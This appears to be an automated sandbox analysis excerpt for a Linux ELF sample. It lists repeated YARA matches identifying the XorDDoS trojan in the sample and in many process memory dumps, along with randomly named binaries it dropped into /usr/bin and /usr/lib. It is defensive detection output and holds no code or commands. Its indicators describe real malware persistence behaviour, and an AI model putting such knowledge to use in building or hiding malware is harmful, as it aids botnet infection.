Source: Yara match	File source: fuck.elf, type: SAMPLE
Source: Yara match	File source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6294.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6270.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6275.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6313.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6278.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6379.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6322.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6429.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6525.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6347.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6361.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6448.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6376.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6308.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6423.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6235, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6237, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6239, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6270, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6273, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6275, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6278, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6281, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6294, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6305, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6310, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6313, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6322, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6325, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6327, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6330, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6339, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6342, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6347, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6350, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6358, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6361, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6367, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6379, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6382, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6385, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6387, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6395, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6398, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6401, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6415, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6421, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6423, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6429, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6441, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6451, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6454, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6459, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6466, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6469, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6475, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6477, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6483, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6486, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fuck.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/pzvxnaaphf, type: DROPPED
Source: Yara match	File source: /usr/bin/oklqvchkds, type: DROPPED
Source: Yara match	File source: /usr/bin/ujuhiugmmi, type: DROPPED
Source: Yara match	File source: /usr/bin/xodlvzjoas, type: DROPPED
Source: Yara match	File source: /usr/bin/zfyjfaoiow, type: DROPPED
Source: Yara match	File source: /usr/bin/hwcijqdbza, type: DROPPED
Source: Yara match	File source: /usr/bin/axppigwavk, type: DROPPED
Source: Yara match	File source: /usr/bin/ggsxjmacxa, type: DROPPED
Source: Yara match	File source: /usr/bin/wjnxqdxblo, type: DROPPED
Source: Yara match	File source: /usr/bin/xocmdvejxu, type: DROPPED
Source: Yara match	File source: /usr/bin/sanzuhhixf, type: DROPPED
Source: Yara match	File source: /usr/bin/zkleyiegjf, type: DROPPED
Source: Yara match	File source: /usr/bin/jflhtagbsg, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: fuck.elf, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: fuck.elf, type: SAMPLE	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: fuck.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6235.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6561.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
